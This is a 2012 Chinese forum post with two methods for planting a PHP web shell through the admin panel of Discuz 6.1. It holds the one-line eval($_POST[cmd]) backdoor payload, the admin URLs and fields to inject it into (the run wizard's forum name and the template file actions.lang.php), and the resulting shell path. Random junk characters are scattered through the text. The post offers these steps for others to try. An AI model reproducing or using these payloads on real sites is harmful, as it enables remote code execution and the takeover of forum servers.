discuz6.1两种方法后台拿shell
9 W, G: [! j* X9 I6 p8 L好多朋友说discuz6.1后台不会拿shell,在前段时间这些都是说不公布的东西,我发出来给大家测试一下
0 X9 a) {" `; ?# p1:
6 Q1 T( ^, I ^2 a* L; e; l' D3 ]http://127.0.0.1/discuz/admincp. ... zard&frames=yes# _- e$ s% m0 ]6 y2 T
admincp.php?action=runwizard&frames=yes点击下一步然后再论坛名称的地方插入webshell
: K u& [! m* x1 H<?php eval($_POST[cmd]);?>7 W$ z; \. z" j" D. V' c! X- h6 x
后台webshell地址:http://127.0.0.1/discuz/forumdata/logs/runwizardlog.php, d+ K9 r0 N5 ~. o, b0 t3 M( U" j+ I
6 F& K* [3 h$ n% ?% U: A
9 I, |+ K; I8 R7 z/ \. |6 f2:后台模板管理--默认模板套系--详情
1 g5 ]1 V" O. Y# _templates/default/actions.lang.php
# Z$ P. ~8 X m O$ R: L1 e1 d* xjhackj\\');eval($_POST[cmd])?>;//
. x9 k( t% n$ o! A9 R9 o
" N9 {& d l( s: M4 N: g利用很简单,聪明的人一看就懂了 |
发表于 2012-9-13 16:59:17
收藏
支持
反对